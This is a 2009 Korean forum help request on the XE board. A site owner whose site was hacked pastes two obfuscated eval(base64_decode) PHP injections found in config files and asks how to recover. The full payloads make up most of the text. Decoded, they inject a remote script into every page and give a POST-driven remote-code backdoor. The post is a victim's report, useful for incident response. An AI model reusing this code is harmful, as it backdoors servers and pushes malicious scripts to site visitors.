묻고답하기
base64_decode
2009.11.18 18:59
현재 홈피가 마비되었습니다.
호스팅에 알아보니 해킹이 어쩌구.....개인정보가 누출....
화일 찾아보니
/html/config/config.inc.php에
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnYWFyJykpe2Z1bmN0aW9uIGFhcigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMWxjMmQxY25WcmRXeGhMbU52YlM5NVlXaHZiMTl6YVhSbFgyRmtiV2x1TDJsdVpHVjRMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gYWFyMigkYSwkYiwkYywkZCl7Z2xvYmFsJGFhcjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGFhcjEpKWNhbGxfdXNlcl9mdW5jKCRhYXIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdhYXInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdhYXInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kYWFybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignYWFyMicpKSE9J2FhcjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
이렇게 되어 있고
/html/files/config/db.config.php에
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnampkJykpe2Z1bmN0aW9uIGpqZCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMWxjMmQxY25WcmRXeGhMbU52YlM5NVlXaHZiMTl6YVhSbFgyRmtiV2x1TDJsdVpHVjRMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gampkMigkYSwkYiwkYywkZCl7Z2xvYmFsJGpqZDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGpqZDEpKWNhbGxfdXNlcl9mdW5jKCRqamQxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdqamQnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdqamQnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kampkbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignampkMicpKSE9J2pqZDInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php if(!defined("__ZBXE__")) exit();
이런게 있습니다.
호스팅업체에서는 전문가를 동원해서 화일 하나하나 검색해 위와 같이 삽입된 악성코드를 삭제해야 한다고 합니다.
저에 개인신상 정보가 노출되 발생된 일이라고요.
그래서 /html/files/config/db.config.php의 악성코드 삭제 files외 전체 삭제후 1.2.4를 다운받아 설치했으나 멍통
이럴때에는 어찌해야 하나요?
방법 좀 알려 주시면 감사하겠습니다.
글쓴이 | 제목 | 최종 글 |
---|---|---|
XE | 공지 글 쓰기,삭제 운영방식 변경 공지 [16] | 2019.03.05 by 남기남 |
LEE명우 | 제로보드XE 게시판에서 오류가납니다 [1] | 2009.11.18 by 백성찬 |
taenie | 홈페이지 접속 오류 [1] | 2009.11.18 by 백성찬 |
개발. | 일정시간 사용안하면 자동로그안웃되게 할 수 없나요. [1] | 2009.11.18 by 백성찬 |
넘버백 | 리퍼러 관리에서 클릭했을때 새로운창으로 열리게 할수 있나요? | |
elma | 게시판에서 첨부된 이미지가 출력되지 않습니다. [1] | 2009.11.18 by 백성찬 |
뮤카 | 회원가입 창이 뜨질 않습니다. [1] | 2009.11.18 by 백성찬 |
보가니 | 파일첨부가 안되고 사라집니다. [1] | 2009.11.18 by 휘즈 |
마이콘 | script를 메인에 삽입하는 방법좀 자세히 알려주세요 [2] | 2009.11.18 by 마이콘 |
엔시아- | 쉬운 설치가 작동하지 않습니다. [1] | 2009.11.18 by 우리아기 |
닉.네.임 | base64_decode [1] | 2009.11.18 |
개발. | 자동로그아웃 타임 수정가능한가요..? | |
초보탈출염원 | 서버이전에 대해서.. [8] | 2009.11.18 by 초보탈출염원 |
봄나들이 | XE보드로 투명게시판,투명페이지 만들수있나요? [2] | 2009.11.18 by 된장맛껌 |
번개손 | 위젯 코드 생성이 안되네요... [1] | 2009.11.18 by 된장맛껌 |
토마토881 | 에디터 이미지등록에관한질문 꼭좀바주십사.. [1] | 2009.11.18 by 백성찬 |
최완주 | 링크 주소가 달라집니다. | |
최완주 | 메인 페이지수정 에러 | |
넘버백 | 레이아웃 xe_official_v2 의 서브메뉴 빈공간활용할수 있나요? [2] | 2009.11.19 by 넘버백 |
베나자르 | 첨부파일 업로드 100%에서 사라지는 현상 [2] | 2009.11.19 by teuss |
jomogun | 팀블로그 만들기 [1] | 2009.11.19 by fenriz |